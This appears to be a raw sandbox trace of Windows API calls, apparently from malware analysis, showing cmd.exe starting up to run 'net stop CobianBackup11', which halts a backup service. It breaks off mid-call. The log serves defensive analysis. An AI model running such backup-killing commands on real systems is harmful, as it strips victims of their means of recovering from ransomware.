returned 1 [0069.608] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.608] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0069.608] GetEnvironmentStringsW () returned 0x562038* [0069.608] GetProcessHeap () returned 0x550000 [0069.608] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x562b10 [0069.609] FreeEnvironmentStringsW (penv=0x562038) returned 1 [0069.609] GetProcessHeap () returned 0x550000 [0069.609] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4) returned 0x560c70 [0069.609] GetEnvironmentStringsW () returned 0x562038* [0069.609] GetProcessHeap () returned 0x550000 [0069.609] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x5635e8 [0069.609] FreeEnvironmentStringsW (penv=0x562038) returned 1 [0069.609] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e81c | out: phkResult=0x22e81c*=0x68) returned 0x0 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x0, lpcbData=0x22e820*=0x1000) returned 0x2 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x4) returned 0x0 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x1000) returned 0x2 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x0, lpcbData=0x22e820*=0x4) returned 0x0 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x4) returned 0x0 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x4) returned 0x0 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x1000) returned 0x2 [0069.610] RegCloseKey (hKey=0x68) returned 0x0 [0069.610] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e81c | out: phkResult=0x22e81c*=0x68) returned 0x0 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x1000) returned 0x2 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x4) returned 0x0 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x1000) returned 0x2 [0069.610] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x0, lpcbData=0x22e820*=0x4) returned 0x0 [0069.611] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x9, lpcbData=0x22e820*=0x4) returned 0x0 [0069.611] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x9, lpcbData=0x22e820*=0x4) returned 0x0 [0069.611] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x9, lpcbData=0x22e820*=0x1000) returned 0x2 [0069.611] RegCloseKey (hKey=0x68) returned 0x0 [0069.611] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb4 [0069.611] srand (_Seed=0x5d97ebb4) [0069.611] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop CobianBackup11" [0069.611] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop CobianBackup11" [0069.611] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.612] GetProcessHeap () returned 0x550000 [0069.612] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x562038 [0069.612] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x562040, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.612] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.612] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.612] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.612] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.612] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.612] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.612] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.612] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.612] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.612] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.612] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.612] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.612] GetProcessHeap () returned 0x550000 [0069.612] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x562b10 | out: hHeap=0x550000) returned 1 [0069.612] GetEnvironmentStringsW () returned 0x562250* [0069.612] GetProcessHeap () returned 0x550000 [0069.613] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xae2) returned 0x564bb0 [0069.613] FreeEnvironmentStringsW (penv=0x562250) returned 1 [0069.613] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.613] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.613] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.613] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.613] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.613] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.613] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.613] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.613] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.613] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.613] GetProcessHeap () returned 0x550000 [0069.613] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x5656a0 [0069.613] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f5e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.614] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x22f5e8, lpFilePart=0x22f5e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f5e4*="Desktop") returned 0x25 [0069.614] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.614] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f364 | out: lpFindFileData=0x22f364*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x561eb8 [0069.614] FindClose (in: hFindFile=0x561eb8 | out: hFindFile=0x561eb8) returned 1 [0069.614] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x22f364 | out: lpFindFileData=0x22f364*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x561eb8 [0069.614] FindClose (in: hFindFile=0x561eb8 | out: hFindFile=0x561eb8) returned 1 [0069.614] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.615] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x22f364 | out: lpFindFileData=0x22f364*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x561eb8 [0069.615] FindClose (in: hFindFile=0x561eb8 | out: hFindFile=0x561eb8) returned 1 [0069.615] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.615] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.615] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.615] GetProcessHeap () returned 0x550000 [0069.615] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564bb0 | out: hHeap=0x550000) returned 1 [0069.615] GetEnvironmentStringsW () returned 0x5640c0* [0069.615] GetProcessHeap () returned 0x550000 [0069.615] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb36) returned 0x565f00 [0069.615] FreeEnvironmentStringsW (penv=0x5640c0) returned 1 [0069.615] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.615] GetProcessHeap () returned 0x550000 [0069.616] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5656a0 | out: hHeap=0x550000) returned 1 [0069.616] GetProcessHeap () returned 0x550000 [0069.616] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400e) returned 0x566a40 [0069.616] GetProcessHeap () returned 0x550000 [0069.616] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x561eb8 [0069.616] GetProcessHeap () returned 0x550000 [0069.616] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566a40 | out: hHeap=0x550000) returned 1 [0069.616] GetConsoleOutputCP () returned 0x1b5 [0069.617] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.617] GetUserDefaultLCID () returned 0x409 [0069.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.617] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f728, cchData=128 | out: lpLCData="0") returned 2 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f728, cchData=128 | out: lpLCData="0") returned 2 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f728, cchData=128 | out: lpLCData="1") returned 2 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.618] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.619] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.619] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.620] GetProcessHeap () returned 0x550000 [0069.620] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20c) returned 0x562dc8 [0069.620] GetConsoleTitleW (in: lpConsoleTitle=0x562dc8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.620] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.620] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.620] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.620] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.621] GetProcessHeap () returned 0x550000 [0069.621] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x566a40 [0069.621] GetProcessHeap () returned 0x550000 [0069.621] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566a40 | out: hHeap=0x550000) returned 1 [0069.621] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.621] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.621] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.621] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.621] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.621] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.621] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.621] GetProcessHeap () returned 0x550000 [0069.621] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x562fe0 [0069.621] GetProcessHeap () returned 0x550000 [0069.621] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x10) returned 0x55ff10 [0069.622] GetProcessHeap () returned 0x550000 [0069.622] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x32) returned 0x563040 [0069.622] GetConsoleTitleW (in: lpConsoleTitle=0x22f420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.623] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.623] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.623] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.623] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.623] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.623] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.623] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.623] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.623] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.623] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.623] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.623] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.623] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.623] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.623] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.623] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.623] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.623] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.623] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.623] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.623] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.623] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.623] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.623] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.623] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.623] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.623] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.623] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.623] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.623] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.624] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.624] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.624] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.624] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.624] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.624] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.624] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.624] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.624] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.624] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.624] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.624] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.624] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.624] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.624] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.624] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.624] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.624] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.624] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.624] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.624] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.624] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.624] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.624] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.624] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.624] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.624] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.624] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.624] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.624] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.624] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.624] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.624] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.624] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.624] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.624] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.625] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.625] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.625] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.625] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.625] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.625] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.625] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.625] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.625] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.625] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.625] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.625] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.625] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.625] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.625] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.625] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.625] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.625] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.625] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.625] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.625] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.625] GetProcessHeap () returned 0x550000 [0069.625] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x563080 [0069.625] GetProcessHeap () returned 0x550000 [0069.625] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3a) returned 0x563298 [0069.625] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.626] GetProcessHeap () returned 0x550000 [0069.626] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x418) returned 0x5507f0 [0069.626] SetErrorMode (uMode=0x0) returned 0x0 [0069.626] SetErrorMode (uMode=0x1) returned 0x0 [0069.626] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5507f8, lpFilePart=0x22ef40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22ef40*="Desktop") returned 0x25 [0069.626] SetErrorMode (uMode=0x0) returned 0x1 [0069.626] GetProcessHeap () returned 0x550000 [0069.626] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5507f0, Size=0x5c) returned 0x5507f0 [0069.626] GetProcessHeap () returned 0x550000 [0069.626] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5507f0) returned 0x5c [0069.626] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.626] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.626] GetProcessHeap () returned 0x550000 [0069.626] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x120) returned 0x5632e0 [0069.626] GetProcessHeap () returned 0x550000 [0069.626] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x238) returned 0x550858 [0069.632] GetProcessHeap () returned 0x550000 [0069.632] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x550858, Size=0x122) returned 0x550858 [0069.632] GetProcessHeap () returned 0x550000 [0069.632] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x550858) returned 0x122 [0069.632] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.632] GetProcessHeap () returned 0x550000 [0069.632] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe0) returned 0x563408 [0069.633] GetProcessHeap () returned 0x550000 [0069.633] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x563408, Size=0x76) returned 0x563408 [0069.633] GetProcessHeap () returned 0x550000 [0069.633] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x563408) returned 0x76 [0069.634] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.635] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x22ecbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecbc) returned 0xffffffff [0069.635] GetLastError () returned 0x2 [0069.635] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x22ecbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecbc) returned 0xffffffff [0069.635] GetLastError () returned 0x2 [0069.635] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.635] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x22ecbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecbc) returned 0x563488 [0069.636] GetProcessHeap () returned 0x550000 [0069.636] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x5634c8 [0069.636] FindClose (in: hFindFile=0x563488 | out: hFindFile=0x563488) returned 1 [0069.636] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x22ecbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecbc) returned 0xffffffff [0069.636] GetLastError () returned 0x2 [0069.636] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ecbc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecbc) returned 0x563488 [0069.636] GetProcessHeap () returned 0x550000 [0069.636] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5634c8, Size=0x4) returned 0x5634c8 [0069.636] FindClose (in: hFindFile=0x563488 | out: hFindFile=0x563488) returned 1 [0069.636] _wcsicmp 